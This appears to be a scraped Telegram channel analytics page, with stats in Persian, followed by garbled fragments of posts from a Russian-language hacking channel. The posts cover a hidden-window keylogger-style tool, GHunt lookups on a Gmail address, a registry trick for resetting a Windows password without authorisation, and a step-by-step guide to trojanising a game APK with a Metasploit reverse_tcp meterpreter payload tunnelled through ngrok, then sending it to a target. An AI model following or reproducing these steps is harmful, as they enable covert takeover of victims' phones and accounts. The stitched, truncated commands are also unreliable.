CODE RED
Мир глазами программистов; лучшая литература, обучающие статьи, курсы и некоторые полезные лайфхаки. Обратная связь: @encryptedadm
نمایش بیشتر📈 تحلیل کانال تلگرام CODE RED
کانال CODE RED (@coderedcom) در بخش زبانی روسی بازیگری فعال است. در حال حاضر جامعه شامل 10 355 مشترک است و جایگاه 9 416 را در دسته فناوری و برنامهها و رتبه 61 181 را در منطقه روسيا دارد.
📊 شاخصهای مخاطب و پویایی
از زمان ایجاد در невідомо، پروژه رشد سریعی داشته و 10 355 مشترک جذب کرده است.
بر اساس آخرین دادهها در تاریخ 03 دسامبر, 2024، کانال فعالیت پایداری دارد. در ۳۰ روز گذشته تغییر اعضا برابر 0 و در ۲۴ ساعت گذشته برابر 0 بوده و همچنان دسترسی گستردهای حفظ شده است.
- وضعیت تأیید: تأیید نشده
- نرخ تعامل (ER): میانگین تعامل مخاطب 0% است و در ۲۴ ساعت نخست پس از انتشار، محتوا معمولاً N/A% واکنش نسبت به کل مشترکان کسب میکند.
- دسترسی پستها: هر پست به طور میانگین 0 بازدید دریافت میکند. در اولین روز معمولاً 0 بازدید جمعآوری میشود.
- واکنشها و تعامل: مخاطبان بهطور فعال حمایت میکنند؛ میانگین واکنش به هر پست 0 است.
📝 توضیح و سیاست محتوایی
نویسنده این فضا را محل بیان دیدگاههای شخصی توصیف میکند:
“Мир глазами программистов; лучшая литература, обучающие статьи, курсы и некоторые полезные лайфхаки.
Обратная связь: @encryptedadm”
به لطف بهروزرسانیهای پرتکرار (آخرین داده در تاریخ 04 دسامبر, 2024)، کانال همواره بهروز و دارای دسترسی بالاست. تحلیلها نشان میدهد مخاطبان بهطور فعال با محتوا تعامل دارند و آن را به نقطه اثرگذاری مهم در دسته فناوری و برنامهها تبدیل کردهاند.
pyinstaller -F --onefile --nocosole main.py
Чтобы перевести программу в режим ожидания, в котором она будет не активна, требуется зажать комбинацию клавиш «Alt + A». А если нужно вернуть активный режим, стоит нажать сочетание клавиш «Ctrl + Alt».
📌https://github.com/pro100git/watcher
#безопасностьpython -m pip install -r requirements.txt
Настройка
check_and_gen.py
python hunt.py почтаюзера@gmail.com
Этот проект использует Selenium и автоматически загружает правильный драйвер для вашей версии Chrome. Так что просто убедитесь, что у вас установлен Google Chrome.
📌https://github.com/mxrch/GHunt
#OSINT user
Просмотрев список пользователей, выбираем нужного и прописываем команду
user <имя выбранного пользователя> <новый пароль>
Если имя содержит пробелы, его нужно взять в кавычки.
Далее нужно откатить правки в реестре. Вписываем в консоль regedit и переходим к разделу HKEYLOCALMACHINE\System\Setup. Из параметра CmdLine удаляем значение, а в SetupType прописываем 0.
Готово! Теперь можно закрывать редактор и командную строку, перезагружать устройство и авторизовываться с помощью нового пароля.apt-get install -y zipalignЕщё нам понадобятся программы keytool и jarsigner, которые находятся в Java SDK. Утилиту Apktool можно скачать запустив этот файл. Также понадобятся предустановленные ngrok и Metasploit. Сборка бекдора Запускаем в отдельном окне ngrok
tcp 4444Полученные lhost и lport используем для создания пейлоада
-p android/meterpreter/reverse_tcp LHOST=<адресс lhost> LPORT=<значение lport>M> /home/kali/payload.apkНа выходе получаем apk файл. Его и файл игры, в которую будем вшивать вирус, нужно распаковать с помощью комманд
d game.apk ◽️apktool d payload.apkТеперь остается преобразить загрузочный файл бекдора. Копируем папку metasploit по пути /payload/smali/com/ в /game/smali/com/. Теперь переходим в папку /game/smali/com/dotgears/game/ и открываем файл SplashScreen.smali. В нем находим метку "virtual methods" и после строки начинающейся на invoke-super, то есть на строку под номером 34, вставляем
{p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
Теперь нужно обновить запрос разрешений при установке. Для этого переходим в папку payload и из файла AndroidManifest.xml копируем все теги uses-permission. Вставляем их в аналогичный файл AndroidManifest.xml в папке game, удалив при этом находящиеся там теги uses-permission.
Компилируем отредактированный файл игры в apk
b gameГотовый файл нужно искать в game/dist/. Остается его подписать. Генерируем подпись коммандой
-genkey -V -keystore key.keystore -alias codered -keyalg RSA -keysize 2048 -validity 1000Получаем файл key.keystore. Теперь сертифицируем наш apk
-verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore game.apk coderedВыравниваем подписанное приложение командой
-v 4 game.apk game_good.apkГотово! Теперь можно захватывать сессию на целевом смартфоне отослав туда данный apk файл. Атакуемое устройство, в нашем случае, должно находиться в локальной сети с атакующим, поскольку мы изначально в целях демонстрации выбрали такие параметры в ngrok.
